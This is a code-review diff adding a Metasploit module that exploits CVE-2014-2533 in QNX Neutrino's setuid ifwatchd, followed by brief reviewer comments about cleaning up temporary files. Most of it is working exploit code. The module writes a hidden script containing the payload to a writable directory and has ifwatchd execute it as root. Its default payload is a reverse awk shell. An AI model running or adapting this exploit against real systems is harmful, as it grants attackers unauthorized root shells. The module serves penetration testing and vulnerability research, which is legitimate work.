modules/exploits/qnx/local/ifwatchd_priv_esc.rb

```diff
@@ -0,0 +1,119 @@
+        command line argument; however, it does not drop privileges when
+        executing user-supplied scripts, resulting in execution of arbitrary
+        commands as root.
+
+        This module has been tested successfully on QNX Neutrino 6.5.0 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'cenobyte',     # Discovery and exploit
+          'Tim Brown',    # Independent discovery
+          'Brendan Coles' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-2533'],
+          ['BID', '66449'],
+          ['EDB', '32153'],
+          ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
+        ],
+      'DisclosureDate' => 'Mar 10 2014',
+      'Platform'       => 'unix', # QNX
+      'Arch'           => ARCH_CMD,
+      'SessionTypes'   => %w(shell meterpreter),
+      'Targets'        => [['Automatic', {}]],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'BadChars'    => '',
+          'DisableNops' => true,
+          'Space'       => 1024,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'gawk generic'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 10,
+          'PAYLOAD'  => 'cmd/unix/reverse_awk'
+        }
+    ))
+    register_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def ifwatchd_path
+    '/sbin/ifwatchd'
+  end
+
+  def check
+    unless setuid? ifwatchd_path
+      vprint_error "#{ifwatchd_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{ifwatchd_path} is setuid"
+
+    CheckCode::Detected
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def is_root?
+    id = cmd_exec 'id'
+    (id.include?('uid=0') && id.include?('root'))
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}"
+
+    print_status 'Writing interface arrival event script...'
+    cmd_exec "echo '#!/bin/sh' > #{script_path}"
+    cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
+    cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"ifwatchd -A\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
+    cmd_exec "echo \"#{payload.encoded.gsub('"', '\"')}\" >> #{script_path}"
+    cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
+
+    cmd_exec "chmod +x '#{script_path}'"
+
+    print_status "Executing #{ifwatchd_path}..."
+    interface = 'lo0'
+    cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
+
+    Rex.sleep 5
+
+    cmd_exec "rm -f '#{script_path}'"
```

Comment:
Isn't this what `register_file_for_cleanup(<path>)` is for?  Or does that not work here?

Reply:
IIRC, we have `register_dir_for_cleanup` for removing folders. `register_file_for_cleanup` is for single files.

Reply:
`register_file_for_cleanup(<path>)` kills the session.

Reply:
The module has been updated to make use of `register_file_for_cleanup`.